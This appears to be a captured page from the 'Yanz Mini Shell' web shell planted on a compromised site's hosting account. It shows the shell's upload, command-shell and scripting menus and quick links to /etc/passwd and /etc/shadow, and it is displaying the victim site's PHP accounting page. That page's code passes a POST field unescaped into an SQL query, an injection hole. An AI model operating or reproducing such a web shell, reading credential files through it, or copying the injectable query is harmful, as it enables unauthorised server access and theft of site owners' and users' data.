Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
housgcjs
elaan.net
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php $path="admin/orna/"; require_once('admin/orna/db.php'); if(isset($_POST['typeahead'])){ $srch=$_POST['typeahead']; $where="where title LIKE '%{$srch}%'";} else{ $where='';} ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content="Dashboard"> <meta name="keyword" content="Dashboard, Bootstrap, Admin, Template, Theme, Responsive, Fluid, Retina"> <title>Sort Subhead Account</title> <script src="assets/js/now.js"></script> <!-- Bootstrap core CSS --> <link href="assets/css/bootstrap.css" rel="stylesheet"> <link href="assets/css/orna.css" rel="stylesheet"> <!--external css--> <link href="assets/font-awesome/css/font-awesome.css" rel="stylesheet" /> <link rel="stylesheet" type="text/css" href="assets/js/gritter/css/jquery.gritter.css" /> <!-- Custom styles for this template --> <link href="assets/css/style.css" rel="stylesheet"> <link href="assets/css/style-responsive.css" rel="stylesheet"> <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <section id="container" > <!--header start--> <?php require_once('inc-core/header.inc')?> <!--header end--> <!--sidebar start--> <?php require_once('inc-core/side-bar.inc');?> <!--sidebar end--> <section id="main-content"> <section class="wrapper"> <form action="list_of_acccounts.php" method="POST"> <table class="table table-striped table-advance table-hover"> <thead> <tr> <th class="col-md-12"> <a href="onscreen/list-of-accounts.php" target="_blank" class="btn btn-theme btn-xs"><i class="fa fa-print"></i> Print</a> </th> </tr> <tr> <th class="col-md-10"> <h3>Sort Subhead Account </th> </tr> </thead> </table> </form> <div class="row" style="margin:0 1em;"> <div class="col-md-12"> <table class="table table-striped table-advance table-hover"> <thead> <tr class="table_header"> <th class="col-md-2"><i class="fa fa-circle-thin"></i> Account #</th> <th class="col-md-7"><i class="fa fa-quote-left"></i> Subhead Acounts Title</th> <th class="col-md-2"><i class=" fa fa-list-ol"></i> Sort</th> <th class="col-md-1"><i class=" fa fa-cog fa-spin"></i> Action</th> </tr> </thead> <tbody> <?php $sql2="select * from `".$MySQL_database."`.acc_sub ".$where." order by title"; $query2=mysqli_query($connection,$sql2); $x=0; while($trans=mysqli_fetch_assoc($query2)) { $x=$x+1; print" <tr> <td>"; echo $trans['acc_nm_s']; print"</td> <td>"; echo $trans['title']; print"</td> <td style=\"font-weight:bold;\"><input type=\"text\" id=\"";echo str_pad($x,3,0,STR_PAD_LEFT);print"\" value=\""; echo $trans['sort']; print"\"></td> <td> <button class=\"btn btn-danger btn-xs sort\" data=\"acc_sub/acc_nm_s\" mydata=\"";echo str_pad($x,3,0,STR_PAD_LEFT);print"\" id=\""; echo $trans['acc_nm_s']; print"\"><i class=\"fa fa-pencil-square-o\"></i> Sort</button> </td> </tr>";}?> </tbody> </table> </div><!-- /col-md-12 --> </div><!-- /row --> </section><!--/wrapper --> </section><!-- /MAIN CONTENT --> <!--main content end--> <?php require_once('inc-core/footer.inc')?> </section> <!-- js placed at the end of the document so the pages load faster --> <script src="assets/js/jquery.js"></script> <script src="assets/js/bootstrap.min.js"></script> <script src="assets/js/jquery-ui-1.9.2.custom.min.js"></script> <script src="assets/js/jquery.ui.touch-punch.min.js"></script> <script class="include" type="text/javascript" src="assets/js/jquery.dcjqaccordion.2.7.js"></script> <script src="assets/js/jquery.scrollTo.min.js"></script> <script src="assets/js/jquery.nicescroll.js" type="text/javascript"></script> <script src="admin/ajax/js/sort.js"></script> <!--common script for all pages--> <script src="assets/js/common-scripts.js"></script> <script type="text/javascript" src="assets/js/gritter/js/jquery.gritter.js"></script> </body> </html>
Free Space : 77943828480 Byte